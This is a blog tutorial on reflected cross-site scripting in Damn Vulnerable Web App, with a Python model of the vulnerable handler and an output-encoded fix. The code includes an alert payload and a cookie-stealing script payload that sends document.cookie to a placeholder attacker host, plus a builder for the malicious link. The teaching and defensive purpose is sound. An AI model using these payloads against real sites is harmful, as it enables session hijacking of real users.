I was in two minds about whether to write this up, as Cross Site Scripting (XSS) is such a massive subject and this really only touches the foundations. However, I’ll give it a go.
What is Reflected Cross Site Scripting (XSS)? (From the OWASP website)
Reflected Cross-site Scripting (XSS) occurs when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page.
Damn Vulnerable Web App
An excellent resource for anyone new to web application security. Clicking the “XSS (Reflected)” link brings up this screen.
A simple question: what is your name? Whatever name is entered is displayed back to you on the page.
During testing it turns out that any data we enter is displayed back to us unchanged, and that it is placed directly into the HTML of the page rather than treated as plain text.
If we look at the source PHP code for the app:
The PHP code simply reads the submitted value from the $_GET superglobal (the query string parameter) and echoes it straight back into the page. That is dangerous because the submitted data is neither validated nor encoded before it is output, so anything the user supplies, including HTML tags and script, becomes part of the response.
*WordPress removes the script tags from the above code. See the real URL below.
When the victim opens the link, the page shows a pop-up alert containing the number zero.
The browser cannot tell the injected script apart from the site’s own, so it executes whatever it is given, which is what produces the alert box. There are many uses for this kind of attack. A more common one is stealing the user’s session cookie while they are still logged in, so that the attacker can be logged in as that user at the same time. This works whenever the session cookie is readable from script, i.e. it was not set with the HttpOnly flag.
How can we protect against this?
The next post will look a little deeper at how the Medium and High security levels try to prevent this attack, and at how the measures they put in place can still be bypassed.
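To make the reflection and the fix concrete, here is an added example that is not DVWA’s own PHP (the original handler is not reproduced on this page): a small Python model of the Low-level “What is your name?” handler beside a hardened version that HTML-encodes the output before it is reflected. The base URL, the function names, the attacker host and the two payloads are all constructed for the example; the first payload is an assumption matching the post’s alert with a zero in it, the second models the session-cookie theft described above.

```python
"""
Added example: a Python model of the DVWA Low-level reflected XSS handler
and a hardened variant. Not DVWA's code. Names and payloads are constructed.
"""
import html
from urllib.parse import parse_qs, urlencode, urlparse

# Constructed base URL standing in for the DVWA page (assumption).
BASE_URL = "http://dvwa.local/vulnerabilities/xss_r/"

# Minimal stand-in for the page HTML; {name} is where the Low-level
# handler echoes the submitted value, inside a <pre> block.
TEMPLATE = (
    "<html><body>"
    "<form>What's your name?<input type=text name=name></form>"
    "<pre>Hello {name}</pre>"
    "</body></html>"
)

# Constructed payloads. The alert one is assumed from the post's description
# of a pop-up with a zero in it; the cookie one sends document.cookie to an
# attacker-controlled host (placeholder domain).
ALERT_PAYLOAD = "<script>alert(0)</script>"
COOKIE_PAYLOAD = (
    "<script>new Image().src="
    "'http://attacker.example/?c='+document.cookie</script>"
)


def malicious_link(payload: str) -> str:
    """Build the link an attacker would send to a victim.
    urlencode percent-encodes <, >, quotes, '+' and '=' so the payload
    survives the round trip through the query string intact."""
    return BASE_URL + "?" + urlencode({"name": payload})


def name_param(url: str) -> str:
    """Model of PHP's $_GET['name']: decode the query string, default to ''."""
    qs = parse_qs(urlparse(url).query, keep_blank_values=True)
    return qs.get("name", [""])[0]


def build_page_vulnerable(url: str) -> str:
    """Low level: the decoded parameter is dropped straight into the HTML."""
    return TEMPLATE.format(name=name_param(url))


def build_page_hardened(url: str) -> str:
    """Same handler with output encoding. html.escape(quote=True) turns
    < > & " ' into entities, the equivalent of PHP's
    htmlspecialchars($name, ENT_QUOTES, 'UTF-8'), so the browser renders
    the input as text instead of parsing it as markup."""
    return TEMPLATE.format(name=html.escape(name_param(url), quote=True))


def injected_markup_survives(page: str, payload: str) -> bool:
    """True if the payload appears byte-for-byte in the response, i.e. the
    browser will parse the <script> element and run it."""
    return payload in page


if __name__ == "__main__":
    for payload in (ALERT_PAYLOAD, COOKIE_PAYLOAD):
        link = malicious_link(payload)
        print("link:      ", link)
        print("vulnerable:", injected_markup_survives(build_page_vulnerable(link), payload))
        print("hardened:  ", injected_markup_survives(build_page_hardened(link), payload))
        print()
```

Running the script prints each crafted link, then True for the vulnerable handler and False for the hardened one: the encoded page contains `&lt;script&gt;alert(0)&lt;/script&gt;`, which the browser displays literally. The check is deliberately a plain substring test, because that is exactly the property that matters: if the attacker’s bytes reach the HTML parser unchanged, the browser cannot tell them from the site’s own markup. Output encoding at the point where untrusted data meets HTML is the fix; input filtering on its own, which is what the Medium and High levels attempt, is a weaker substitute.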